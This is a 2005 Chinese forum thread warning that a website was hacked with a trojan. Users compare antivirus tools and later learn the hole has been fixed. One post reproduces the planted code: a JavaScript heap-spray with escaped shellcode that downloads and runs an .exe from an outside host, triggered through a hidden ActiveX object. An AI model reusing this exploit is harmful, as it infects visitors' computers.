文曲星空间站被黑客种了木马，大家千万不要上！

siemen · 发表于 2005-8-16 18:46:00

哎
要不就是被旁注的
他那个服务器怎么这么差

116205035 · 发表于 2005-8-16 19:04:00

我日，不小心中了，赶紧杀之~

十七·烈行风 · 发表于 2005-8-16 19:07:00

中了,怎么K8杀不了!

sohumaoggh · 发表于 2005-8-16 19:24:00

在安全模式下看看能不能

epcdiy · 发表于 2005-8-16 19:27:00

< HTML >
< SCRIPT language="javascript" >
food = unescape("%u9090%u9090%u10eb%u4b5b%uc933%ub966%u013c%u3480%u990b%ufae2%u05eb%uebe8%uffff%u70ff%u9934%u9999%u12c3%uaa6b%u3559%u01a4%u9999%uec99%u186f%u5175%u9999%u1299%u106d%ubdcf%u0c71%u9999%uaa99%u1042%u669f%uf1af%ud717%u7597%u3471%u9999%u1099%u91df%uf5f1%u99f5%uf199%uf7f6%ufdb7%uecf1%uf5eb%ucdf4%ucf66%u1091%u9ddf%uaf66%ue7f1%u7b41%u71ea%u9911%u9999%udf10%u6695%uf1af%u6701%u9713%ue071%u9999%u1099%u8ddf%uaf66%ubcf1%u6629%u715b%u99f3%u9999%udf10%u6681%u9def%uaff1%ub683%u71e9%u99c3%u9999%udf10%uf389%uf1fc%ub7ea%ue1fc%uff10%u6685%u85ef%ucf66%uaa81%uc850%u66c8%u85ef%uef66%uc8bd%ucf66%uaa89%uc850%uef66%u6685%u8dcf%ucf66%u7095%u9919%u9999%ucfcc%u38fd%u99a9%u9999%u591c%u95e1%ud912%u1295%u85e9%u1234%u91f1%u9072%ud912%u12ad%u2131%u9999%u1299%uc75c%u5bc4%u999d%uccca%ucecf%uf512%u81bd%udc12%u12a5%u9ccd%u9ae1%u124c%u81d3%uc312%u9ab9%u7a44%ud0ab%uad12%u9a12%uaa6c%u6566%u59aa%ua335%ued5d%u589e%u9456%u619a%u6b72%ue5a2%u8dbd%u78ec%uc312%u9abd%uff44%u9512%u12d2%u85c3%u449a%u9d12%u9a12%u725c%uaa9b%u1259%uc64c%uc4c7%u5bc2%u999d%u5071%u6667%u6866%u7474%u3a70%u2f2f%u7777%u2e77%u6a6b%u3731%u6e2e%u7465%u672f%u6175%u676e%u6167%u2f6f%u7264%u6165%u2f6d%u6574%u7473%u652e%u6578%u0098");
dish = unescape("%u0D0D%u0D0D");headersize = 20;
lobster = headersize+food.length
while (dish.length< lobster) dish+=dish;
shrimp = dish.substring(0, lobster);
raven = dish.substring(0, dish.length-lobster);
while(raven.length+lobster< 0x40000) raven = raven+raven+shrimp;
cat = new Array();
i=0;while(++i< 500){cat = raven + food;}
< /SCRIPT >
< div style="display:none" >
< object classid="clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa" width="256" height="64" >
< param name="_extentx" value="1" >
< param name="_extenty" value="1" >
< param name="autostart" value="1" >
< param name="shuffle" value="0" >
< param name="prefetch" value="0" >
< param name="nolabels" value="0" >
< param name="src" value="smile.smil" >
< param name="controls" value="controlpanel,statusbar" >
< param name="console" value="clip" >
< param name="loop" value="1" >
< param name="numloop" >
< param name="center" >
< param name="maintainaspect" value="0" >
< /object >
< /div >
< /HTML >

epcdiy · 发表于 2005-8-16 19:31:00

以上为该病毒代码

luojixx · 发表于 2005-8-16 19:34:00

明知山有虎偏向虎山行,我杀
[em05]

epcdiy · 发表于 2005-8-16 19:37:00

以下是引用luojixx在2005-8-16 19:34:16的发言：[BR]明知山有虎偏向虎山行,我杀
[em05]

我干脆把完整的病毒代码发出来好了

风的颜色 · 发表于 2005-8-16 20:06:00

晕，我用的也是江民，这个东西对木马很是敏感啊。。。
刚才打开楼上的源代码居然查出来了。

lepus · 发表于 2005-8-16 20:38:00

怪不得我下午上的时候诺顿就报警了，晕，防护好差啊！！！怎么就中毒了而且危害性这么大，他们站长不管的吗？？？

金笛 · 发表于 2005-8-16 21:06:00

以下是引用风的颜色在2005-8-16 20:06:23的发言：[BR]晕，我用的也是江民，这个东西对木马很是敏感啊。。。
刚才打开楼上的源代码居然查出来了。

我用瑞星，也是很敏感……

gssasd · 发表于 2005-8-16 21:18:00

去看看，网吧的机子，我不怕`

my49cn · 发表于 2005-8-16 22:10:00

以下是引用lepus在2005-8-16 20:38:14的发言：[BR]怪不得我下午上的时候诺顿就报警了，晕，防护好差啊！！！怎么就中毒了而且危害性这么大，他们站长不管的吗？？？

站长TGCLC去北京还没回来，其他人没有权限。网站已发布相关公告，提醒大家注意。
中毒原因为dvbbs漏洞，今后将会修复。

siemen · 发表于 2005-8-17 11:41:00

以下是引用eeppcc在2005-8-16 19:37:00的发言：[BR]]
我干脆把完整的病毒代码发出来好了
[upload=txt]viewFile.asp?ID=3896[/upload]

拜该位达人
DV的漏洞...晕到
用江民哦
江民好
瑞星也行
K8有的国内病毒杀不了

my49cn · 发表于 2005-8-17 16:08:00

已经修复了

herolhf · 发表于 2005-8-17 21:41:00

我常看到这个
Service Unavailable
???????

十七·烈行风 · 发表于 2005-8-17 22:02:00

象是服务器忙,多F5就好了

书剑飘零 · 发表于 2005-8-21 12:05:00

那现在修复了吗?

my49cn · 发表于 2005-8-21 12:19:00

以下是引用my49cn在2005-8-17 16:08:00的发言：[BR]已经修复了

早就好了，大家放心浏览。
PS：建议版主锁了

书剑飘零 · 发表于 2005-8-21 12:21:00

哈哈,谢谢,放心了

		自动登录	找回密码
密码			加入易码